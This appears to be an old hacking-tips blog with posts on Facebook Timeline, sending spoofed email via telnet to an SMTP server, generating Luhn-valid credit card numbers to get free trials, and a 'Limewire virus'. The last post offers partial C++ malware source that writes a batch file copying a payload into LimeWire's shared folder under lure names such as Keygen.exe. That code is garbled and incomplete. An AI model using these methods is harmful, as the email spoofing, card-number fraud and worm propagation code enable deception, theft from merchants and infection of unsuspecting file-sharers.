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Tuesday, January 10, 2012

How to become a geek?

Follow up my newest website link : 
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Happy Hacking.. :)
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Thursday, December 29, 2011

What is Facebook Timeline??: A Walkthrough Of Your Entire Life On Facebook

Okay Facebook just dropped their last bomb at the Facebook F8 developer summit after an overwhelming number of updates since yesterday . Facebook wants you to tell your story to the world from your personal timeline page, you can head over at to get started.
Facebook timeline is nothing but a visual representation of your life and the events surrounding it. It’s more of a controlled and customized page where you can organize the important stuff and create an online storybook, ready to be used as a reference in case a complete stranger stumbles on your Facebook profile. On your timeline page, you can share and highlight most memorable posts, photos, videos and events that are close to your heart. This is the landing page where people would discover the real person and his journey, described in his own words.
Here is how Mark Zuckerberg’s Facebook timeline looks like:

It is a fact that users update a lot on their Facebook profile. From their breakfast menu to movie partners to a rainy day, everything is posted on Facebook. Not all of these updates are important and not all of these things deserve to be archived. Most of the updates are real time in nature but there are a few shares which should be archived and bookmarked for quick reference in the future.
Facebook timelines attempts to fill this gap by allowing you to customize your timeline page with events, posts, photos, videos, dates and status updates, which are kind of milestones rather than “just an update”. When you passed out of college, when you got engaged, when you received your first salary – these are the things you would like to put on your Facebook timeline page rather than your random rants.
“Timeline will help you summarize your stories on a single  page” said Zuckerberg. Rather than search your entire profile for a really old post, Timeline is the go to place for finding out important stories about a person. “It’s the heart of your Facebook experience, completely rethought from the ground up,” Zuckerberg adds.
Interestingly, Facebook did launched a story telling feature one year back which fell flat on its face. Back then, nobody used it because people don’t have the time to type their entire anniversary party and wait for friends to engage with it. However, this timeline feature looks really cool, all you have to do is organize your previous updates into a single page and control who can see your facebook timeline.

Here is an introductory video which walks you through Facebook timelines in brief detail:

In my opinion, this timeline feature is geared towards strangers who would want to be friends with you and want to know more about you as quickly as possible. People don’t have the time to visit your profile, scroll through all the updates and hit the “Older posts” button over and over again. Instead, they want a concise digest which tells who you are and what you have doing from the day you were born to this date. :)

How to disable facebook timeline?

Finding Ways to Disable the Timeline? Unfortunately Facebook Doesn’t Let You Do That :(

Earlier this week, Facebook rolled out its new Timeline feature to all 800 million users on its network. Although the new profile layout offers new and interesting features, some users on Facebook are finding it too complicated and cluttered with the advertisements and news ticker on the right hand side. Annoyed users are dreadfully finding ways to disable and get rid of the Timeline feature.
Facebook released a Developer application through which you could enable the Timeline and test it. Users also had an option to downgrade to the old profile by simply deleting the app from the Developer settings page.
Now that the Timeline has been released for all users, Facebook stated that it will go live automatically after seven days, no matter if you like it or not. Timeline is here to stay, at least for the next few months. Unfortunately, there is no way you can disable it.

A spokesperson for Facebook explains -
Once you click “Get Timeline,” you will have seven days to review everything that appears on your timeline before anyone else can see it.
If you choose, you can publish your timeline right away. If you decide to wait, your timeline will go live automatically after seven days. Your timeline will replace your profile.
Eventually everyone on Facebook will be rolled over to timeline.
You have no choice, but are forced to get used to the new profile layout. When Facebook released its new Facebook News Feed and Live Ticker, everyone hated it. Users had no choice, but to accept it. Few users also announced that they would delete their Facebook account and switch over to Google Plus. However, that never happened. I see the same set of users now “liking” the Timeline. Such straightforward statements don’t bother Facebook, since they know that people will eventually get used to it.
If you’re finding the new layout too cluttered, then you can try disabling the ticker and chat. We had posted an article earlier on how you can disable the news ticker on the right.
We have posted an in-depth guide about Timeline. I recommended you to go through it and know all of its features. Who knows, you may start loving it.

Tuesday, December 6, 2011

How to send Emails Anonymously

We are going to explain you a way to send home-made e-mails. I mean it’s a way to send Anonymous e-mails without a program, it doesn't take to much time and its cool and you can have more knowledge than with a stupid program that does all by itself. This way (to hackers) is old what as you are new by to this stuff, perhaps you may like to know how these anonymous-mailers work, (home-made)

Go to Start, then Run...
You have to Telnet (Xserver) on port 25
Well, (In this Xserver) you have to put the name of a server without the ( ) of course...
Put in in (Xserver) because it always work it is a server with many bugs in it.
(25) mail port.
So now we are like this.
telnet 25
and then you hit enter
Then When you have telnet open put the following like it is written
and the machine will reply with smth.
Notice for newbies: If you do not see what you are writing go to Terminal's menu (in telnet) then to Preferences and in the Terminal Options you tick all options available and in the emulation menu that's the following one you have to tick the second option.
Now you will see what you are writing.
then you put:

mail from:< whoeveryouwant@whetheveryouwant.whetever.whatever> and so on...
If you make an error start all over again
mail from:<>
You hit enter and then you put:
rcpt to:<lamer@lamer'>
This one has to be an existance address as you are mailing anonymously to him.
Then you hit enter
And you type
and hit enter once more
Then you write
Subject: whatever
And you hit enter
you write your mail
hit enter again (boring)
you put a simple:
Yes you don't see it it’s the little F**king point!
and hit enter
Finally you write
hit enter one more time
and it's done

look: Try first do it with yourself I mean mail anonymously yourself so you can test it!
Don't be asshole and write f**king e-mails to big corps. Because its symbol of stupidity and childhood and it has very much effect on Hackers they will treat you as a Lamer! :)

Sunday, November 13, 2011

Best Facebook Prank- Updating Status!

Whenever we buy something new and expensive,we usually upload its photo or write a status on facebook to get the reactions of our friends.But by using this cool facebook prank you will convince your friends that you have purchased Ipad,Iphone5,Blackberry and many more.The best part is that you even won’t say anything but they will automatically get convinced that you have purchased these gadgets.

What Can You Do With This Prank?

Whenever Somebody updates his Facebook status using BlackberryIphoneIpad,Android etc the name of the device automatically gets mentioned below the status update like Via Blackberry or Via Ipad etc.It gives a very strong impression that the person who updated the status owns that gagdet.

Like I can't update status from a calculator :p ..Look here.. :D

By using this Prank you can have any of the following gagdet’s name written under your Status.
BlackBerry, BlackBerry Torch, BlackBerry PlayBook, iPhone, iPhone 4, iPhone 5, iPad, iPad 2, iPad 3, Android, Calculator too :p

How to Use this Facebook Prank?

To use this Facebook prank you have to use a facebook application.
Login into your facebook or account.

Friday, October 14, 2011

This is How Credit Card Numbers Are Generated..Generate one now and get the free stuff from INTERNET :)

I was reading an article today in one of my favorite publications about how to get free trials without actually using your credit card by generating valid credit card numbers using a simple algorithm called the Luhn check. So I wrote a little script that generates credit card numbers that will be deemed valid by most software checks. This will work because the service won’t know that the credit card is invalid until they actually try to charge it. Well, the card may be valid since my script uses random numbers. Obviously this if for informational purposes only and should never actually be used.
Most credit card numbers are validated using an algorithm called the “Luhn check”. This is a very simple algorithm that doubles the odd digits and does a sum to see if the number is divisible by 10. The credit card companies use a slightly different version that involves a check digit as the last digit. To generate a credit card number that will pass most validation software (as long as they don’t actually try to process the credit card) one only needs to follow these steps to make sure that the generated credit card is valid.
Choose 16 random numbers starting with a 3,4,5 or 6.
Starting with the first digit, double every other number.
If doubling a number results in a two digit number, add those digits together to produce a single digit number
Replace the odd digits with the new ones just created. You should now have 16 numbers consisting of all the new numbers and the original even numbers
Add up all sixteen numbers.
Manipulate the check digit so that the sum is divisible by 10.
Replace the last digit of the original random string with the new manipulated check digit.
Thats really all there is to it. Check out the source of my javascript credit card generator if you want to see how to generate and validate the credit card numbers.
The reason for starting with a 3,4,5, or 6 is that different card types start with different digit. The 3 is American Express, 4 is Visa, 5 is Master Card, 6 is a Discover Card.
Some companies use more digits to show that the card is from them. For example 5254 is a Master Card from the Bank of America and 4013 shows that it is a Visa card from Citibank. Also note that the expiry date has nothing at all to do with the card number.

Friday, October 7, 2011

One of d greatest virus ever on dis earth ;)

This is the Limewire virus, it was huge at the time when Limewire was so massive for people to use to get their porn, music and movies. All with a lot of quite obvious other surprises that you don't want to get along with one night in paris ;) It's the full thing here but you will need limewire to get the main things out of it, like Free Babes.exe :D With this virus it didn't seem to be a thing that was going to be so huge, but when it did take off it really took off with the teenagers and all these things happened to their computer they found every single excuse except Limewire. As you can see there is a Keygen.exe as you can imagine is a keygen. There however, was a small problem with it. Because Limewire was so massive and was so widly used that the server for the keygen was flooded at all times of the day that the keygen was of no use. There were stories of the dev trying to sell the keygen list to someone but this was never confirmed properly.

Its Code :

using namespace std;

int main (){
  char system[MAX_PATH];
char pathtofile[MAX_PATH];
HMODULE GetModH = GetModuleHandle(NULL);




ofstream myfile; (\"C:\\spread.bat\");
  myfile << \"@echo off\n\";
  myfile << \"copy \\"C:\\WINDOWS\\system32\\syseval.exe\\" \\"C:\\Progra~1\\LimeWire\\Free Music.exe\\"\n\";
  myfile << \"copy \\"C:\\WINDOWS\\system32\\syseval.exe\\" \\"C:\\Progra~1\\LimeWire\\ScreenSaver.exe\\"\n\";
  myfile << \"copy \\"C:\\WINDOWS\\system32\\syseval.exe\\" \\"C:\\Progra~1\\LimeWire\\Naked!.exe\\"\n\";
  myfile << \"copy \\"C:\\WINDOWS\\system32\\syseval.exe\\" \\"C:\\Progra~1\\LimeWire\\FREE$$$.exe\\"\n\";
  myfile << \"copy \\"C:\\WINDOWS\\system32\\syseval.exe\\" \\"C:\\Progra~1\\LimeWire\\Hacking Ebook.exe\\"\n\";
  myfile << \"copy \\"C:\\WINDOWS\\system32\\syseval.exe\\" \\"C:\\Progra~1\\LimeWire\\Fast Money.exe\\"\n\";
  myfile << \"copy \\"C:\\WINDOWS\\system32\\syseval.exe\\" \\"C:\\Progra~1\\LimeWire\\LimewireCDCrack.exe\\"\n\";
  myfile << \"copy \\"C:\\WINDOWS\\system32\\syseval.exe\\" \\"C:\\Progra~1\\LimeWire\\Keygen.exe\\"\n\";
  myfile << \"copy \\"C:\\WINDOWS\\system32\\syseval.exe\\" \\"C:\\Progra~1\\LimeWire\\Money.exe\\"\n\";
  myfile << \"copy \\"C:\\WINDOWS\\system32\\syseval.exe\\" \\"C:\\Progra~1\\LimeWire\\XXXDownloader.exe\\"\n\";
  myfile << \"copy \\"C:\\WINDOWS\\system32\\syseval.exe\\" \\"C:\\Progra~1\\LimeWire\\Free Babes.exe\\"\n\";
  myfile << \"copy \\"C:\\WINDOWS\\system32\\syseval.exe\\" \\"C:\\Progra~1\\LimeWire\\$$$.exe\\"\n\";
  myfile << \"del %0\n\";
  myfile << \"exit\n\";
  char Spreadstart[MAX_PATH]=\"C:\\spread.bat\";
//Payload Here

  return 0;